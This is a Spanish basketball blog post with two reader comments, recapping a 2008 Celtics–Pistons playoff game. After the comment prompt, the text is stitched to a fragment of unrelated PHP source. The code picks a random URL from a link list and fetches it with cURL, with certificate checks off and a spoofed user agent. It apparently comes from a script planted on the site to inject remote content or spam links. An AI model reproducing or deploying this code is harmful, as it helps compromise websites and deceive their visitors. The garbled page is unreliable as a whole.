Recuperando el factor cancha (BOS 94 – 80 DET)

25 de May de 2008 por xapa_croack

Una gran primera parte de Boston (50-32) sobró para que se llevaran la victoria del “palacio” y recuperaran el factor cancha en las Finales del Este. Nada más llegar la primera derrota en casa, parece que Doc Rivers les ha imprimido otro carácter defensivo y de esta manera se quitan el san benito de no poder ganar fuera del Boston Garden justamente en una de las canchas mas difíciles.

Garnett fue el líder que se esperaba cuando se le fichó por verano y pletórico consiguió 22 puntos, 13 rebotes y 6 asistencias siendo el claro MVP del partido. Allen, entonándose poco a poco, consiguió 14 puntos, 6 asistencias y 6 rebotes y el último integrante del Big Three, el californiano Pierce, no hizo un gran partido ofensivamente pero se dedicó a secar a Prince. El resto de jugadores pusó su granito de arena con Perkins, Rondo y Posey anotando cada uno 12 puntos.

En Detroit solo se salvaron “Rip” Hamilton con 26 puntos y el novato Stuckey con 17, este último pudo ser la mejor noticia para unos mermados pistons. Prince con su 2 de 11 se quedo en 4 puntos y el maltrecho Billups sólo pudo anotar 6 con dolores en el tendón del partido anterior. Detroit tan solo inquietó algo a los verdes en el tercer cuarto cuando se pusieron a 13 puntos, pero un parcial de 0-12 verde les rompió todas las esperanzas de conseguir algo positivo en el partido.

La madrugada del lunes al martes en Detroit a las 02.30 hora española jugarán el 4 partido de la serie siendo un partido crucial para Detroit, ya que de perder tendrían que ganar los siguientes 3 partidos para jugar las Finales.

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Cambio radical del panorama en la final del Este.
    Si el otro día decíamos que Boston había aprendido la dolorosa lección de no tener suficiente ni con ganar todos los partidos que les queda en casa ni con lograr hacer funcionar al Big Three a pleno rendimiento, anoche lograron darle la vuelta a la tortilla a todo eso.

    Anoche firmaron su mejor partido en todos los playoffs y no lo pudieron hacer ni en el mejor momento, ni en el mejor escenario ni de mejor forma posible.
    Si alguna virtud podemos destacar todo lo que habían hecho hasta ahora es su firme intención de apoyar con todo a determinados jugadores que lo necesitaban. Siempre un pase extra al jugador en cuestión para que éste se la jugara, a pesar de quizá no ser la mejor opción posible, con el único propósito de recuperarle para la causa. Al final parece haberles funcionado la táctica y anoche lograron involucrar a todo el mundo de una forma sin precedentes para ellos.
    Hasta 6 jugadores con dobles figuras anoche, y el resto que tuvo algún minuto aportando su granito de arena también en ataque como hasta ahora lo habían hecho en defensa. Intensidad y solidaridad. Esos son los máximos valores de este equipo. Y vaya si los pusieron en práctica.

    Nada pudo hacer Detroit, con un nefasto partido de su arquitecto Billups que parece haber recaído en sus problemas físicos en el momento más inoportuno. Sin Billups pudieron con Orlando, pero ahora no es lo mismo. Cambia, por tanto, radicalmente el panorama de los que le dábamos por favoritos si no logran recuperarlo. Anoche, además, coincidió con el peor partido de Prince en ataque y una terrorífica eficacia exterior que no ayudó precísamente a abrir la lata de los Celtics.
    Ahora a rezar para que Billups tenga tiempo para recuperarse un poco y a asegurar el cuarto. Después ya podrán plantearse si son capaces o no de volver a hacer la hazaña de ganar en el Boston Garden.

      Citar

  2. telekoman dice:
    #2

    Como dije en algún comentario anterior: Sabía que pasaría algo así. Yo pensé que el partido peligroso era el 4º, pero estos malditos Celtics se me han adelantado. Y esperemos que esta noche volvamos a la vida y seamos capaces de ganar o la eliminatoria estará totalmente acabada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>